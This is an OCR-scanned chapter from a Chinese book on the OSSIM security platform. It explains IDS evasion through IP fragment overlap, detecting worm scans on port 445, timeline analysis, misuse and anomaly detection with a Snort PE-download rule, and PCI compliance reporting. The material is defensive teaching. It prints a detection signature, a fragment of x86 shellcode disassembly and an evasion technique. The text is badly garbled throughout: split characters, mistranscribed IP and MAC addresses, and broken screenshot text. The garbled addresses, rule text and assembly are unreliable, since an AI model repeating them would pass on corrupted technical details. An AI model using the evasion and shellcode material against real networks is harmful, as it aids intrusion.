192 168 150 200| 00:0C-2€AF 36:17] 


16 5| 


1921681502 O^ 


192 168150 174 Oe 
192.168.1.89 


[192:168.1.87 192:168.1.87 
192.168.1.89 192.168.1.89| 00:50:56:F7:85:16]| 
192.168.1.92 192.168.1.92| 00.50.56.F7.85.16| 
[192 1681 74 192 168 1 74| 0050.56F7.85.16| 
192.168.129.119 192.168.129.1 19| 00:50:56:F7:85:16| 
192.168.1127 192.166.1.127| 00.50.56f7.85.16| 


192 168 12998 182 188 129 98| 00 so se F785-16| 
192.168.129.109| 00:50:56:£7:35-16 

192.168.120 | 00.50.56 7.85.16] 
192:168.129.23| 00:50:56:£7.85-16 
192.168.129.31| 00:50-56:F7:85-16] 


192 168 129 3| 00:50:56:F7-85-16] 


192168-129109 


[192.168.1.20. 


9-121. 无 流量 的 虚假 P 信息 


接 下 来 ， 谈 谈 IP 碎片 攻击 对 IDS 的 危害 。 当 路 由 器 准备 将 IP 分 组 发 送 到 网 络 ， 而 该 网 
络 又 无 法 将 这 个 IP 分 组 一 次 全 部 发 送 完 时 ， 路 由 器 必须 将 该 分 组 分 成 小 块 ， 使 其 长 度 能 够 满 
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足 这 一 网 络 对 分 组 大 小 的 限制 ， 这 些 分 割 出 来 的 小 块 就 叫 碎片 (fragment)。 因 此 ， 小 IP 报 文 
又 称 为 IP REH o IP 碎片 可 以 独立 地 通过 不 同 的 路 径 转 发 ， 而 且 碎 片 不 一 定 按照 次 序 到 达 。 当 
到 达 目 的 主机 后 ， 目 的 主机 会 重组 IP 碎片 。 不 过 ， 现 在 的 IDS 产品 基本 都 具有 良好 的 IP 碎 
片 重组 能 力 ， 因 此 基本 的 IP 碎片 问题 不 会 给 IDS 造成 太 大 的 麻烦 。 但 是 ， 像 碎片 重 琶 之 类 的 
技术 仍 会 带 来 很 大 的 问题 。 

有 的 攻击 者 , 就 利用 了 碎片 重合 方法 实施 攻击 。 当 两 个 碎片 有 部 分 数据 重 辣 时 ,其 中 一 个 
碎片 的 数据 会 覆盖 掉 另 一 个 碎片 的 重 倒 数据。 但 是 ， 至 于 哪 一 个 碎片 重 肝 部 分 的 数据 被 覆 六 ， 
则 由 操作 系统 类 型 决定 。 例如 , 在 Windows 2000 和 Solaris 2.x 系统 中 , 若 碎 片 fragl 先 于 frag2 
到 达 , frag 1 的 数据 会 覆盖 掉 frag2 的 数据 重合 部 分 。 若 两 个 碎片 不 按 正常 顺序 到 达 , 即 frag2 先 
于 fragl 到 达 , frag? 的 数据 会 覆盖 frag 1 的 数据 重合 部 分 。 在 本 书 5.2.4 小 节 介绍 过 利用 Fragroute 
测试 小 包 攻 击 。 


9.10.5 ”协议 分 析 

根据 上 文 介绍 的 方法 , 我 们 基本 定位 了 网 络 故 障 来 源 和 分 类 , 下 面 就 可 以 根据 分 析 数 据 包 
来 查看 这 种 蠕虫 , 我 们 通过 集成 在 OSSIM 系统 中 的 基于 Web 的 抓 包 工具 来 有 针对 地 对 数据 包 
进行 解码 (Decode)， 如 图 9-122 所 示 。 


r— -— n 


9-122 ”利用 OSSIM 进行 协议 分 析 


在 主体 窗口 中 显示 了 抓 包 的 情况 ， 列 出 了 抓 到 数据 包 的 序号 、 时 间 、 源 目的 MAC 地 址 、 
源 目 的 IP 地 址 、 协 议 类 型 、 源 目的 端口 号 等 内 容 。 很 容易 看 出 IP 地 址 为 192.168.150.200 的 
主机 ， 在 极 短 的 时 间 内 向 大 量 的 不 同 主机 发 出 了 访问 请 求 ， 并 且 目 的 端口 都 是 445。 
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图 9-122 可 以 看 出 ， 这 些 数据 包 的 长 度 都 是 62 个 字 节 。 数 据 包 前 12 个 字 节 包括 了 目的 
MAC 和 源 MAC 的 地 址 信息 , 紧 跟着 的 2 字 节 指出 了 数据 包 的 类 型 , 0800 代表 的 是 全 包 格式 ， 
0806 代表 ARP 包 格 式 。 接 着 20 个 字 节 是 封装 的 IP 包头 ， 包 括 了 源 、 目 的 IP 地 址 、 卫 版 本 
号 等 信息 。 剩 下 的 28 个 字 节 封装 的 是 TCP 包头 , 包括 了 源 、 目 的 端口 ，TCP 链接 的 状态 信息 
等 , 这 就 构成 了 一 个 62 字 节 的 包 。 可 以 看 出 除了 这 些 包 头 数据 之 外 ,没有 携带 有 效 数 据 负荷 ， 
所 以 这 是 一 个 TCP 要 求 445 端口 同步 的 空 包 ， 也 就 是 病毒 主机 在 扫描 445 端口 。 一 旦 染 毒 主 
机 同步 上 没有 采取 防护 措施 的 主机 445 端口 ， 便 会 利用 系统 漏洞 传播 病毒 。 
正常 情况 下 访问 主机 有 可 能 在 这 么 短 的 时 间 里 发 起 这 么 多 的 访问 请 求 吗 ? 通常 端 系统 一 
般 都 会 在 发 送 的 数据 段 获得 对 端的 确认 之 后 ， 才 会 主动 发 送 FIN 报 文 ， 释 放 TCP 连接 ， 如 果 
在 多 次 重 传 之 后 仍 未 得 到 对 端的 确认 ， 通 常会 向 对 端 发 送 RST 报 文 ， 异常 释放 TCP 连接 ， 所 
以 在 毫秒 级 的 时 间 内 发 出 几 十 或 更 多 连接 请 求 就 属于 不 正常 。 


时 间 线 分 析 方法 


通常 情况 下 ， 当 攻击 者 入 侵 时 , 他 们 并 不 是 瞄准 某 个 信息 系统 ， 他 们 通常 渗透 后 先 建立 一 
个 支点 ,然后 逐渐 深入 网 络 的 某 主 机 ， 直 到 找到 所 需要 的 信息 。 尤 其 在 网 络 蠕虫 爆发 时 ， 其 攻 
击 间隔 一 般 小 于 1 秒 , 如 何 分 析 发 展 过 程 和 趋势 呢 ? 一 般 通 过 抓 包 软 件 很 难 掌 握 网 络 蠕虫 整体 
爆发 情况 ，OSSIM 中 提供 的 SIEM 控制 台 提供 了 时 间 线 分 析 工 具 ， 该 功能 有 点 类 似 于 Splunk 
这 款 工具 中 的 时 间 线 功能 ， 它 反映 出 了 攻击 频率 ， 是 一 种 比较 直观 的 分 析 工 具 。 


9.11.1 时 间 线 分 析 法 的 优势 
SIEM 控制 台 是 OSSIM 查看 事件 的 平台 ， 它 可 以 规范 化 地 展示 从 远 端 采集 的 数据 ， 在 这 
里 可 以 实现 各 种 数据 的 过 滤 显 示 ， 提 供 的 时 间 线 分 析 工 具 对 分 析 故 障 尤为 重要 ， 其 特点 如 下 : 
e ”时 间 线 将 离散 的 数据 通过 时 间 关 联 曲 线 进行 聚合 。 
e 图 形 化 的 时 间 线 显示 ， 更 容易 找 出 未 知事 件 之 间 的 关联 ， 以 帮助 挖 握 出 一 些 奇 怪 
的 问题 。 
@ “利用 不 同 颜色 更 容易 做 到 感 兴趣 日 志 的 突出 显示 。 


9.11.2 ”实例 

有 明确 意图 的 攻击 总 是 由 一 系列 事件 顺序 组 成 的 ， 下 面 我 们 对 照 图 片 ， 来 讲解 如 何 使 用 
Timeline。 对 于 拒绝 服务 类 攻击 ， 日 志 显示 间隔 可 能 是 秒 级 的 ， 这 些 日 志 仅 靠 人 工 查看 费力 不 
讨好 。 我 们 可 以 利用 时 间 线 分 析 工 具 CTimeline Analysis Tools) 来 解决 这 个 问题 。 使 用 方法 是 
选择 Analysis 一 SecurityEvents (SIEM)， 单 击 Timeline Analysis 按钮 ， 效 果 如 图 9-123 所 示 。 
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ews — anourtn IE 
si fE 
N nr noms [NPTTITT 
时 间 线 解析 度 first event last event panum 
ELI ; 
e 


svg sysiog erty M :sh Fetes password 天 seo sysiog erty 

JH syses: sss entry M Sr Faid password I] Syslog: syslog emy 
I Syslog sysiogoniy pam mor athenticabon taio fj Sysiog syslog entry 
DLL password sys syslog ewy 


Syslog: syslog entry 
Demoa > 0000 
Aug 31 201521:00:15 GMT 


View event dete 


| RH DAMEN 
| 时间 线 向 调 按 乌 | 


| pam [Sysva SSHd Clear Ai. 
me 


DURRURE RR REG ab tt 


图 9-123 时间 线 分 析 


实践 中 还 尝试 诸如 Win32.Lioten.KX、 狙 击 波 〈(Worm.Zotob.A)、Backdoor/SdBot.ce 等 攻 
击 139、445 端口 的 蠕虫 。 由 于 蠕虫 具有 自动 化 、 迅 速 传播 机 制 ， 传 播 速度 非常 迅速 ， 而 且 扫 
描 和 攻击 之 问 的 时 间 间 隔 非常 小 , 根本 无 法 进行 人 工 干 预 , 这 种 情况 下 利用 关联 规则 就 能 将 这 
种 攻击 进行 告警 , 在 局 域 网 中 某 台 机 器 如 果 在 一 段 时 间 内 连接 了 几 百 台 主 机 的 445 端口 , 这 种 
情况 就 很 有 可 能 是 蠕虫 扫描 攻击 。 再 看 一 个 例子 ， 如 图 9-124《〈 间 隔 为 秒 ) 所 示 。 


PEPEE AR | Source} Destination Destination Port: TCP | UDP Product Types | Categories Unique Country Events 
lax24b Last2 days LastWeek Last2 Weeks LastMonth All 
resolution: @ Seconds Mirutes © Hours C Days b Evensto draw [30 £ 
first event last event 
m 
M snort "ET SCAN Potenial SSH Scan" Sif snort "ET SCAN Polenta SSH Scan rot "ET SCAN PaentalssH Scar” 时 snot "ET SCAN Polenta SSH $ 
"snot 'ET SCAN Polential SSH Scan” BM enort "ET SCAN Polania! SSH Scan" Mi snot "ET SCAN Palental SSH Soar” "Kisrort “ET SCAN Polenta SSH Scarí 
inort "ET SCAN Potartiol SSH Sean" S enert "ET SCAN Potunsai SSH Sen" Wienot "ET SCAN Patontial SSH Scar” Si erort: "ET SCAN Poiontial SSH Scar 
LET SCAN Polortal SSH Scan" ae sort "ET SCAN Polenta SSH Scar" 
EET SCAN Poteriai SSH Scan | snort: "ET SCAN Potential SSH Scan“ " IMS BM sort "ET SCAN Polental SSH Scar" 


Md snort "ET SCAN Fatenta SSH Scar” 


1021.106.2023 天 > Host 192168-11-1722 
2 


Misrot "ET SCAN Folental SSH Scar” 
i srot "ET SCAN PoaentalssH Scar” 
Mi srot "ET SCAN poential SSH Scar” 
dj sro “ET SCAN Behavioral Unusual Por 445 vatto, E 
MET SCAN Folemlal SSH sca 
Misro: "ET SCAN Polental SSH scar 
srort "ET SCAN Poientisl SSH Scar" 
istos "ET SCAN Poiantial SSH Soar" 


Feb 22 2014 000.18 GMT 


View event detail 


E 9-124 ”时间 线 分 析 SSH 扫描 


常规 方法 中 ， 如 果 说 蠕虫 难于 分 析 和 捕捉 ， 那 下 一 节 将 要 介绍 的 Shelleode 攻击 就 更 加 难 
以 监测 。 
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利用 OSSIM 进行 高 级 攻击 检测 


WS APT 已 经 对 信息 安全 带 来 了 巨大 挑战 ， 目 前 所 常用 的 Nagios、Ntop、zabbix、Cacti 
等 单独 使 用 某 个 流量 监控 工具 很 难 察觉 APT 攻击 , 所 以 采用 具有 SIEM 功能 的 OSSIM 平台 就 
是 对 付 APT 最 有 效 的 工具 ， 因 为 这 个 系统 可 以 从 不 同 来 源 收集 和 关联 安全 数据 ， 它 们 可 以 帮 
助 你 从 海量 信息 中 找 出 APT 攻击 渗透 入 网 络 的 踪迹 。 

APT 攻击 通常 是 一 种 持续 的 攻击 活动 ， 而 非 单一 的 攻击 事件 。 在 攻击 过 程 中 ， 它 会 利用 
各 种 手段 不 停 地 尝试 ， 直 到 达到 目的 。 许多 攻击 开始 阶段 ,伪装 成 合法 流量 进入 内 网 ， 得 进 之 
后 再 尝试 进行 破坏 。 如 果 你 仅仅 用 Cacti、Zabbix 这 类 工具 ， 而 不 进行 数据 包 深 度 检 测 ， 很 难 
发 现 这 种 隐匿 的 攻击 。 

在 APT 攻击 中 ， 攻 击 者 经 常会 对 目标 网 络 及 应 用 针对 性 地 进行 为 期 几 个 月 甚至 更 长 时 间 
的 渗透 ， 他 们 会 想 尽 办 法 利用 网 络 中 应 用 程序 漏洞 形成 攻击 者 所 需 C&C 网 络 ， 当 一 切 就 绪 ， 
攻击 者 会 在 某 台 服务 器 中 部 署 RootKit， 便 能 通过 精心 构筑 的 C&C 网 络 回 传 目标 文件 。 那 么 
防范 APT 攻击 ， 最 好 的 方法 是 数据 包 检 测 ， 尤 其 是 内 网 数据 包 的 深度 检测 ， 因 为 那些 攻击 数 
据 包 会 进入 网 络 内 部 开展 破坏 和 攻击 行为 ， 对 APT 而 言 ， 传 出 流量 更 具 危 险 性 ， 所 以 采用 
OSSIM 对 传 出 / 传 入 流量 进行 异常 检测 就 是 一 种 行 之 有 效 的 方法 。 

在 网 络 攻击 中 还 有 不 少 是 属于 Shellcode 攻击 ， 但 往往 很 多 管理 员 对 其 不 了 解 ， 在 网 络 攻 
击 过 程 中 , 基于 特征 的 IDS 系统 往往 也 会 对 常见 的 Shellcode 进行 拦截 。 但 一 些 高 级 的 Shellcode 
经 过 乔装 打扮 蒙混 过 关 。 这 个 过 程 就 好 比 一 枚 炮弹 飞 向 目标 的 过 程 。 炮弹 的 设计 者 关注 的 是 怎 
样 计算 飞行 路 线 , 锁定 目标 , 最 终 把 弹头 精确 地 运载 到 目的 地 并 引爆 ,而 并 不 关心 所 承载 的 弹 
头 里 到 底 装 的 是 沙子 还 是 核弹 。Shellcode 在 网 络 监测 中 容易 忽视 ,但 其 危害 巨大 ， 其 实 
Shellcode 是 在 渗透 时 作为 载荷 运行 的 一 组 机 器 指令 ， 它 通常 用 汇编 语言 编写 ， 在 如 果 监 控 网 
段 存在 Shellcode 攻击 则 会 被 记录 ， 在 OSSIM 的 SIEM 控制 面板 中 可 以 明显 看 到 此 次 攻击 。 


9.12.1 ” 误 用 检测 与 异常 检测 
OSSIM 中 的 事件 分 析 器 使 用 了 误 用 检测 (Misuse detection) 与 异常 检测 (Anomaly 
Detection) 两 种 技术 。 下 面 我 们 分 别 介绍 这 两 种 检测 技术 的 特点 。 


1. 误 用 检测 ( Misuse detection ) 


误 用 检测 是 基于 特征 码 检测 技术 (Signature-based detection)， 系 统 的 目标 是 检测 主体 活动 
是 否 符合 这 些 模式 。 所 以 最 适合 已 知 模式 的 检测 ， 系 统 里 使 用 了 简单 匹配 (Pattern Matching) 
以 及 专家 系统 。 例 如 Snort 特征 码 ,“ET POLICY PE EXE or DLL Windows file download” 达 到 
一 定数 量 需要 引起 我 们 注意 ， 下 面 我 们 观察 在 SIEM 中 的 事件 ， 如 图 9-125~ 图 9-127 所 示 。 
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Events OOTA Timeline 


Croup Evenes oy BENENE 
Dipiejeg events 1-26 o about 26 matcMog yeursckection AT events In dantase 
Signature CTotü£(*)4  UnigueSr #  UriqueDst & Latest Event Groph | 
aet | 
ossec: Integrity checksum changec. | 
r zs 2 2 133156 | 
d. mua [iot TT POLY PE EE or T || 


m Elk Windows file douriosd" s 2 1 2014-02-20 214947. | 


图 9-125 在 SIEM 中 发 现 可 疑 文件 下 载 


Real-time 


EDT 
Intertoce 
2014-6 5 5:00 sie 1 E 
Tnggered Signature Category Sub-Category 
0] 20 G2 LL snort "tT POUCY PE EXE or OLL Wnoows me ownloadr 2000419 Pony ame 
Daro Source Name. Prod Type. Dato Source ID 
smor Imrason Detector 101,5 E 
Sce Address Source Port Destination Asares» Destnuvon Port Protocol 
= ns 3 Hor: -000ccca9dc00 51987 To 
mor e. 


Vni Event De Prony Fobepory Re 


3442 1163-0994-0002- 


tb2dd3a4cegc 


int Context information is enl avalasie in Alien Vault USM Sever 
图 9-126 分 析 报 警 内 容 


Poyload length = 25 


000 : 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 32 
010 : 00 30 00 31 00 32 00 20 00 


-y.r.i.g.h.t... 


i Snort rule Detection 


File: emerging-policy.rules 
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET any 
msg: "ET POLICY PE EXE or DLL Windows file download 
flow: established,to client 
content: "MZ" 
byte. jump: 4,58, relative little 
content: "PEI00 00|" 
distance: -64 
within: 4 
flowbits: set,ET.http.binary 
reference: url,doc.emergingthreats.net/bin/view/Main/2000419 
classtype: policy-violation 
sid: 2000419 
rev: 18 


pcap File: * Download in pcap format 


9-127 分 析 有 效 载荷 


2. 异常 检测 ( Anomaly detection ) 


本 书 第 6 章 介绍 的 snort 是 基于 特征 检测 的 NIDS， 它 能 根据 事件 特征 (signature) 准确 识 
别 已 知 攻击 行为 ， 但 攻击 者 会 将 恶意 流量 进行 分 片 、 压 缩 、 编 码 以 规避 NIDS 检测 ， 此 时 遇 到 
了 一 定 技术 瓶颈 ， 要 更 好 地 检测 出 未 知 攻击 ， 还 要 使 用 异常 检测 手段 。 
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异常 检测 技术 通常 先 构建 正常 用 户 行为 集合 ,再 比较 被 监测 系统 实际 行为 模式 和 正常 模式 
之 间 的 偏离 程度 ,最 终 确定 是 否 属于 入 侵 . OSSIM 中 的 异常 检测 技术 用 到 “模式 比较 ”和 “ 聚 
类 ”等 算法 ,通过 关联 规则 建立 正常 行为 模式 ,然后 通过 行为 比较 判定 攻击 。 这 样 ， 不 需要 过 
多 依赖 系统 的 相关 知识 ， 具 有 较 强 的 适应 性 。 

优点 是 可 以 检测 新 的 入 侵 行 为 , 缺点 是 误 报 较 多 。 大 多 数 的 正常 行为 的 模型 使 用 一 种 矩阵 
的 数学 模型 ， 和 矩阵 的 数量 来 自 于 系统 的 各 种 统计 指标 ， 比 如 CPU 使 用 率 、 内 存 使 用 率 、 登 录 
时 间 、 次 数 、IP、 网 络 活动 及 文件 改动 等 ， 在 OSSIM SIEM 控制 台中 通过 DATA SOURCES 列 
表 中 选择 “anomalies” 能 观察 到 实例 如 图 9-128、 图 9-129 所 示 。 


Unique Events Ù} = Sensors Unique Data Sources 


Source Port: TC? | UD? n 
Destination Port: TCP} | Product Types 
UDP Categories 


ossec: Host-based 
| anomaly detection. s 1 1 2014-02-20 13:37:34 
event (rootcheck). Fe Tra TR We Ire Te 


9-128 Hi OSSEC 检测 到 异常 


Event Type ID. Category Sub-Category 
510 Alert HostlOS Alert 
Product Type Dota Source ID 
Intrusion Detection 7093 4 

Source Address Source Port. Destination Address. Destination Port Protocol 

10.32.1433 0000 o Tce 
Unique Event IDe Asset S+ D Priority Reliobility Risk 

SaSelle3-8052-000c-2942-958d10a95388 Z->2 1 T 9 

userdoto2 userdotoà 
Host-based anomaly detection event (rootcheck ossec,rootcheck 


9-129 查看 异常 报警 内 容 


接着 我 们 在 SIEM 控制 台中 利用 时 间 线 分 析 工 具 查看 Shellcode 的 具体 实例 ， 如 图 9-130 
所 示 ， 我 们 可 以 选中 某 个 Shellcode 日 志 查看 详情 。 
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> More Filters 


Tere trame seiecton GUT-& 00. 四 


T- SMELLCODE x86 nc etx NOOP- 

[7 SMELLCODE x85 nc etx NOOP 

j [7 SNELLCOOE x86 NOOP 

[7 SWeLLCOOE x86 NC^^ 

[7 sWéLLCODE x86 NC 
[7 sWeLLCODE x86 NC 


[7 SM&LLCODE x86 NC 


T" swucootaev 时 间 线 分 析 
m SELLcocE sew 国 sneuLcooe x56 NOOP Wl SHELLCOOE x86 inc etx NOOP 
[^ SMELLCOOE x86 Ne Mil SHELLCODE x6 NOOP Wil SHELLCODE x86 NOOP 
厂 SHELLcooE x86 NC ll SHELLCODE x86 ne etx NOOP 
[7 swtLcoOE ase ne BIE SHELLCODE x86 ne etx NOOP 
(T^ SWiicooE sm Wl SHtLLCODE x06 NOOP 

c ili SELL CODE x6 NOOP 

ili SELL CODE x6 NOOP 

ill SELL CODE x6 NOOP 

ili SHELLCOODE x86 NOOP 

Mill SHELLCOOE x86 NOOP 


Æ 9-130 用 时 间 线 分 析 攻 击 


收 到 这 个 消息 时 的 Shellcode 事件 有 可 能 是 误 报 。 大 多 数 这 些 规则 是 通用 的 ， 可 能 会 得 到 
| 大 量 的 误 报 。 


问题 来 了 ， 既 然 有 异常 检测 还 有 特征 检测 ,还 是 会 伴随 误 报 的 情况 ,为 何 ? 因为 网 络 入 侵 
检测 本 身 就 具有 不 确定 性 , 这 就 使 得 误 报 或 漏 报 成 为 必然 。 无 论 是 异常 检测 还 是 特征 检测 ， 都 
必 有 误 报 或 漏 报 , 异常 检测 以 正常 活动 的 特征 轮廓 为 基准 , 但 我 们 并 不 能 保证 不 符合 正常 活动 
轮廓 的 网 络 行为 就 是 真实 攻击 ， 就 像 上 面 的 例子 中 也 有 些 Shellcode 攻击 属于 误 报 (False 
Positive). 

反 过 来 理解 , 我 们 也 不 能 保证 符合 正常 活动 的 行为 就 一 定 不 是 攻击 。 特征 检测 的 基础 是 恶 
意 流量 符合 独特 的 模式 , 而 正常 或 良性 流量 不 符合 , 但 我 们 并 不 能 保证 所 有 的 正常 流量 都 不 符 
合 , 即 不 能 保证 特征 与 恶意 流量 的 一 一 对 应 关系 , 也 有 可 能 有 些 无 恶意 的 正常 的 数据 包 也 符合 


9.12.2 ”绘制 Shellcode 代码 执行 流程 图 

程序 执行 流程 我 们 会 在 一 些 反 编译 工具 中 看 到 , 在 OSSIM3.x 版 本 中 也 有 这 样 的 功能 , 在 
图 9-131 中 绘制 的 图 像 能 显示 以 下 信息 : 

e ”装载 运行 指令 的 过 程 ， 一 共 多 少 指令 ; 

e 在 这 个 界面 中 绘制 出 刚刚 执行 过 的 指令 块 及 其 调用 关系 ; 

@ 将 刚 读 入 的 指令 块 读 入 后 ， 观 看 静态 代码 的 同时 了 解 程序 动态 执行 的 流程 。 
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| er c 
ss = 
Open Tct Was premy 
a" olienvault =m EE uz 
EB professional SIEM Ueresohec alarms GEEZ] ves NE — aco 
TxJCL1701E ESSCUDCUU call Üx5b 
(jj Dashboards 5x00417073 5E pop esi 
zl0417074 $800 pash byte [x30 
0z0417076 55 Pop ecx 
snes) Gx00417077 548319 Act sb, fd [ecx] 
0x041707s 3E530C nov ebx, [中 sr0sc] 
ucc EET EI 
Cx00417030 8E13 acy ebx, [etx 
^ SIEU Events ERU ay be deea 
? pash ebr 
gen lO Hla gee4EoeEe pazh dverd trece 
? H call esi 
$ Vunerstites 
Is x0041701¢ 53 push ebe 
0x0041701e 55 posh ebp 
Y non €x) push esi 
D e Dos edi 
lE Monitors E Ei acv E rau] 
x ED acv sax, [edptOx3 
eec p 38540576 acv edx. [edpteaxt Da70] 
* Cx) OIEA add edx. 
€x) 3B4A18. xcv ecx, [edxe0x16] 
7, Tools 0x26417031 3B5A20 xcv ebx, [edxe0x20 j 
0x26417034 01ES add ebx.e: 
aged] 
JB Maxine 1 
00417036 E332 jecsz (x34 
dec ec 
mov esi. [sbxeecxet] 
0x004] E Eu id 
M xor edi edi 
0x60417040 FC cld 
0x00417041 31C0 xýr sax eax 
Dx00417043 AC Latsb 
Dx00417044 36ED al ah 
* 
0x60417046 7407 jz|0x9 
2 Cx00417046 CCEOD ToT pdi, 0nd 
0x0041704t 3B7C2414 cap edi, [peép30t1304b 01C7 add edi,eax 
T 0x0041704G EBF2 jnp (x££itfit4 


9-131 绘制 Shellcode 指令 执行 流程 


9.12.3 ”收集 异常 行为 流量 样本 

在 分 析 网 络 异常 流量 和 服务 器 异常 行为 时 , 仅仅 根据 SIEM 控制 台中 报告 的 各 种 安全 告警 
事件 还 不 够 ， 安 全 人 员 还 需要 抓 取 异 常 流量 的 封包 样本 分 析 Payload， 在 此 之 前 ， 工 程 师 们 常 
常 额外 架设 一 套 抓 包 系统 ， 现 在 通过 OSSIM 的 Suricata 就 可 以 实现 保存 HTTP 流量 中 的 指定 
后 缀 或 者 特定 格式 的 文件 , 比如 jpg. pdf. exe 等 。 图 9-132 所 示 为 异常 事件 中 保存 的 Payload, 
随时 可 以 下 载 ， 这 个 特性 对 希望 抓 取 恶意 软件 样本 的 安全 研究 人 员 非 常 有 用 。 
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PCAP FILE: 于 DOWNLOAD IN PCAP FORMAT 


* @ GENINFO 
+ g” FRAME 
it IP 


PAXIDAU * dj Version: 4 
* ij Header length: 20 bytes 
* 4 Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00: Not-ECT (Not ECN-Capable Transport) 
二 9j Total Length: 76 
* i) Identification: 0x2407 (9223) 
* 4 Flags: 0x02 (Don't Fragment) 
* d} Fragment offset: 0 
* dj Timeto live: 64 
* d} Protocol: UDP (17) 
* d| Source: 192.168.11.105 (192.168.11.105) 
* d| Source or Destination Address: 192.168.11.105 (192.168.11.105) 
* d} Source Host: 192.168.11.105 
* i} Source or Destination Host: 192.168.11.105 
* d Destination: 192.168.11.7 (192.168.11.7) 
* 5 Source or Destination Address: 192.168.11.7 (192.168.11.7) 
* d Destination Host: 192.168.11.7 
* d| Source or Destination Host: 192.168.11.7 


9-132. "FAX Payload 


合 规 管理 及 统一 报表 输出 


9.13.1 合 规 管理 目标 

通过 对 收集 的 各 种 设备 日 志和 安全 事件 进行 深入 挖掘 , 结合 安全 合 规 管理 , 达到 帮助 建设 
企业 信息 安全 合 规 管理 体系 的 目标 。OSSIM 系统 能 够 生成 不 同 的 安全 合 规 报表 ， 通 过 检查 信 
息 系 统 中 的 各 种 安全 合 规 项 信息 ， 生 成 安全 合 规 测试 报告 ,以 达到 对 安全 合 规 管理 的 要 求 ， 帮 
助 企 业 规避 风险 。 


9.13.2 ”主要 技术 

OSSIM 系统 中 可 以 根据 用 户 的 需要 ， 将 各 种 日 志 以 及 已 检测 到 的 流量 和 入 侵 行 为 ， 动 态 
地 生成 各 种 类 型 的 报表 , 通过 Web 的 方式 实现 报表 的 预览 与 打印 。 该 功能 就 是 由 通用 报表 模 
块 实现 完成 ， 也 就 是 常 说 的 BI 商业 智能 〉 系统 中 的 报表 模块 ， 报 表 模 块 的 核心 是 报表 生成 
引擎 Jasper Reports， 它 采用 了 开源 项 目 ， 是 一 个 强大 、 灵 活 的 报表 生成 工具 ， 能 够 展示 丰富 
的 内 容 ， 并 将 之 转换 成 PDF、HTML、XLS、CSYV 或 者 XML 格式 。 

在 OSSIM 有 些 商 业 版 本 中 利用 Jasper Reports+JFreeChart 的 模式 做 统计 报表 分 析 。 它 完全 
采用 Java 编写 ， 在 OSSIM 2.x 和 3.x 版 本 中 这 些 报表 信息 存放 在 jasperserver 数据 库 中 ， 到 了 
OSSIM 4.3 版 本 采用 了 新 的 架构 ， 采 用 Jgraph 技术 ， 如 果 将 Tomcat 服务 关闭 报表 就 会 停止 输 
出 。 

在 OSSIM 系统 所 有 报表 (包括 饼 状 图 、 柱 状 图 、 曲 线 图 、 雷 达 图 等 ) 的 升级 都 是 采用 Jasper 
Reports. 设计 的 强大 而 直观 的 可 视 化 报表 设计 器 ， 而 开发 Jasper Reports 的 工具 叫做 iReport 


615 


开源 安全 运 维 平台 一 一 OSSIM 最 佳 实践 


(http://communityjaspersoft.com/)。 这 个 报表 工具 允许 用 户 可 视 化 编辑 包含 charts 等 复杂 的 报 
表 。 它 还 集成 了 JFreeChart 图 表 制 作 包 ， 人 允许 用 户 可 视 化 地 编辑 XML JasperDesign 文件 。 用 
于 打印 的 数据 可 以 通过 多 种 方式 获取 , 包括 JDBC, TableModels、 JavaBeans, XML, Hibernate 

(支持 HQL 查询 语言 )、CSYV 等 。 它 支持 多 种 输出 格式 , 包括 PDF, RTF, XML, XLS, CSV 
A HTML. 

在 日 志 报 表 输 出 方面 ，OSSIM 系统 中 可 以 输出 Alarm. Asset. Availability, Business & 
Compliance ISO PCI、Geographic、 Metric、SIEM Events、Tickets、Vulnerabilities、User Activity 
十 几 个 大 类 ， 其 中 每 个 大 类 还 可 以 细 分 若干 子 类 。 


9.13.3 ”什么 是 合 

安全 管理 中 要 求 所 有 日 志 的 归档 都 需要 遵循 法 规 遵从 (Compliance) 原则 。Alienvault USM 
可 帮助 企业 满足 PCI-DSS 支付 卡 行业 数据 安全 标准 ) 中 R1~R12 各 项 条 款 的 要 求 。 例 如 ， 第 
10 款 中 要 求 支 付 服务 提供 商 必须 记录 系统 日 志 ， 以 便 追 踪 并 报告 对 其 网 络 资源 和 持 卡 人 数据 
的 所 有 访问 。 网 络 环境 中 的 日 志 , 可 在 出 现 问题 的 时 候 用 于 刑侦 分 析 。 如果 没 有 系统 活动 日 志 ， 
那 将 很 难 找到 故障 原因 。 

在 OSSIM 中 查看 方法 为 Threat Intelligence 一 Compliance Mappging， 如 图 9-133 所 示 。 


al Q SS El X 


"HREAT INTELLIGENCE 


KOWAMAKEMANG cosscomenon — pATASOUAC. oo 
iso:mo! | Papss20 | Passo IE 


图 9-133 ” 合 规 性 查询 


合 规 运行 脚本 位 于 /usr/share/ossim/compliance/scripts/datawarehouse/ 目 录 之 下 , 程序 文件 主 
要 为 Perl 脚本 。 


9.13.4 理解 PCI 合 规 遵从 


OSSIM 中 的 合 规 遵从 数据 源 来 源 于 SIEM 控制 台 的 事件 以 及 Logger, 我 们 在 OSSIM USM 
平台 的 Configuration 一 Threat Intelligence 一 PCI DSS 2.0 中 可 以 查看 到 ， 如 图 9-134 所 示 。 
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= Hide details 


Title Page [Main Titk 
Comments & notes 


- Maintain Firewall - Firewall Successful 

Authentication {Number of Events = 25, Source 

Database = siem 

Comments & notes [Tile = Requirement 2, Comments 

= Requirement 2 Do _ ] 

Security - Authentication/Default Credentials 

I Number of Events - 25. Source Database = siem 1 

Asset- Inventory [n 

Comments & notes 

Comments = Requi 
istrative access to 

Source Database = 


icm 
PCI - Protect Stored Data - Database Configuration 
Changes I Number of Events = 25, Source Database = 
siem 

isc Failed Logins 
Database = siem ] 


uccesful Logins 


Database = siem ] 


PCI - Protect Stored Data - Failed Logins [M 
Events = 25, Source Database = siem ] 


— d 
paang: me ER POA 
siem] 


PCI - Restrict Access to Dota - Successful Logins 
[Number cf Events = 25, Source Database = siem ] 
PCI- Wireless - Networks — 


图 9-134 PCI 报表 展示 内 容 
PCI 合 规 遵 从 分 为 六 大 类 ， 共 12 个 需求 ， 详 情 如 下 : 
(1) 第 一 类 : 建设 和 维护 安全 网 络 


€ Requirement 1 — Install and maintain a firewall configuration to protect cardholder data, 
安装 和 维护 防火 墙 配置 ， 以 保护 持 卡 人 数据 ， 说 明 组 织 必须 有 批准 和 测试 所 有 外 部 
网 络 连接 以 及 防火 墙 配置 变更 的 正式 过 程 。 我 们 必须 验证 防火 墙 配置 变更 得 到 了 授 
